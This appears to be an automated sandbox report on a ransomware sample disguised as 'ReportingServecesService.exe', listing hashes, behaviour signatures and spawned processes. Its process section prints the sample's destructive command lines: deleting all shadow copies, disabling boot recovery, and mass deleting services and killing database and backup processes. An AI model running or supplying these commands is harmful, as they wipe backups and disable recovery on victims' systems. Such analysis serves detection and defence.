Analysis
- max time kernel: 4s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 23/09/2022, 16:04
Behavioral task
- behavioral1
  - Sample: ReportingServecesService.exe
  - Resource: win7-20220812-en
General
- Target: ReportingServecesService.exe
- Size: 158KB
- MD5: a8e214683307adaff39783dc656b398a
- SHA1: a4f0e624bd1292130ac46d242e42f33b724665bf
- SHA256: df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a
- SHA512: 9dacd78fdecc64fb5ead740e5e3cd4248bf46a45f1c70dbde950a8231a44dedd961a6f05d44983accfa519193ea466901ac7e7e6725b66fed9fe2e4ccf10429c
- SSDEEP: 3072:y15pcSM4lVY8n8q4wJ8YB5mvig79NvGBdY04cABYK5lht9Raz+BVfRoio+00C/:y15pcKVfJ8MI7XvQLfAW6t5BdFC/
Malware Config
Signatures

- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.

  | description | ioc | Process |
  |---|---|---|
  | File opened (read-only) | `\??\R:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\A:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\G:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\I:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\J:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\S:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\T:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\V:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\X:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\F:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\H:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\N:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\Q:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\M:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\O:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\U:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\W:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\B:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\E:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\K:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\L:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\Y:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\Z:` | ReportingServecesService.exe |
  | File opened (read-only) | `\??\P:` | ReportingServecesService.exe |

- Drops file in Program Files directory (18 IoCs)

  | description | ioc | Process |
  |---|---|---|
  | File created | `C:\Program Files\DVD Maker\en-US\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\7-Zip\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\es-ES\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\ja-JP\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\Full\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\it-IT\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\de-DE\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\fr-FR\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\FILE RECOVERY.txt` | ReportingServecesService.exe |
  | File created | `C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\FILE RECOVERY.txt` | ReportingServecesService.exe |

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.

  | pid | Process |
  |---|---|
  | 2028 | vssadmin.exe |

- Suspicious behavior: EnumeratesProcesses (1 IoCs)

  | pid | Process |
  |---|---|
  | 1144 | ReportingServecesService.exe |

- Suspicious use of AdjustPrivilegeToken (5 IoCs)

  | description | pid | Process |
  |---|---|---|
  | Token: SeTakeOwnershipPrivilege | 1144 | ReportingServecesService.exe |
  | Token: SeDebugPrivilege | 1144 | ReportingServecesService.exe |
  | Token: SeBackupPrivilege | 1976 | vssvc.exe |
  | Token: SeRestorePrivilege | 1976 | vssvc.exe |
  | Token: SeAuditPrivilege | 1976 | vssvc.exe |

- Suspicious use of WriteProcessMemory (16 IoCs)

  | description | pid | Process | procid_target |
  |---|---|---|---|
  | PID 1144 wrote to memory of 2028 | 1144 | ReportingServecesService.exe | 28 |
  | PID 1144 wrote to memory of 2028 | 1144 | ReportingServecesService.exe | 28 |
  | PID 1144 wrote to memory of 2028 | 1144 | ReportingServecesService.exe | 28 |
  | PID 1144 wrote to memory of 2028 | 1144 | ReportingServecesService.exe | 28 |
  | PID 1144 wrote to memory of 684 | 1144 | ReportingServecesService.exe | 32 |
  | PID 1144 wrote to memory of 684 | 1144 | ReportingServecesService.exe | 32 |
  | PID 1144 wrote to memory of 684 | 1144 | ReportingServecesService.exe | 32 |
  | PID 1144 wrote to memory of 684 | 1144 | ReportingServecesService.exe | 32 |
  | PID 1144 wrote to memory of 520 | 1144 | ReportingServecesService.exe | 31 |
  | PID 1144 wrote to memory of 520 | 1144 | ReportingServecesService.exe | 31 |
  | PID 1144 wrote to memory of 520 | 1144 | ReportingServecesService.exe | 31 |
  | PID 1144 wrote to memory of 520 | 1144 | ReportingServecesService.exe | 31 |
  | PID 1144 wrote to memory of 1552 | 1144 | ReportingServecesService.exe | 35 |
  | PID 1144 wrote to memory of 1552 | 1144 | ReportingServecesService.exe | 35 |
  | PID 1144 wrote to memory of 1552 | 1144 | ReportingServecesService.exe | 35 |
  | PID 1144 wrote to memory of 1552 | 1144 | ReportingServecesService.exe | 35 |
Processes

- C:\Users\Admin\AppData\Local\Temp\ReportingServecesService.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ReportingServecesService.exe"
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1144

  - C:\Windows\system32\vssadmin.exe (depth 2)
    Command line: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    - Interacts with shadow copies
    PID: 2028

  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    PID: 520

  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&&&&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer
    PID: 684

  - C:\Windows\SysWOW64\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    PID: 1552

- C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 1976